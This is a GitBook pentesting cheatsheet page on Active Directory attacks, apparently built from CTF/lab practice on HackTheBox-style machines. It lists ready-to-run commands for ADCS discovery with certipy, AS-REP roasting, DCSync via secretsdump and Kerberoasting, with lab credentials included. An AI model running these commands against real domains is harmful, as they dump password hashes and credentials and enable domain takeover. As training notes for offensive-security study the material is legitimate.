cheatsheet
  • Cheatsheet
  • General
  • NMAP
  • Directory and subdomain Enum
  • SMB and RPC
  • DNS
  • LDAP
  • mimikatz
  • Bloodhound
  • SQL Injection
  • password crack
  • Active Directory
  • Wordpress
  • SQLMAP
  • Gitea
  • DS_Store
  • IIS
  • Cypher Injection
  • MSSQL
  • BackDrop CMS
Powered by GitBook
On this page
  • ADCS
  • ASREProast
  • DCSync
  • Kerberoasting

Active Directory

ADCS

  • tool - certipy

  • Reference article - certified-pre-owned

  • to find whether the domain controller is vulnerable or not 

certipy find -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -target 10.10.11.222 -text -stdout -vulnerable

ASREProast

GetNPUsers.py 'BLACKFIELD.LOCAL/' -usersfile user.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.192
impacket-GetNPUsers dante/jbercov -no-pass -dc-ip 172.16.2.5

DCSync

impacket-secretsdump DANTE.ADMIN/jbercov:myspace7@172.16.2.5

Kerberoasting

└─$ impacket-GetUserSPNs -request -dc-ip 192.168.110.55 'painters.htb/riley:P@ssw0rd'

Previouspassword crackNextWordpress

Last updated 25 days ago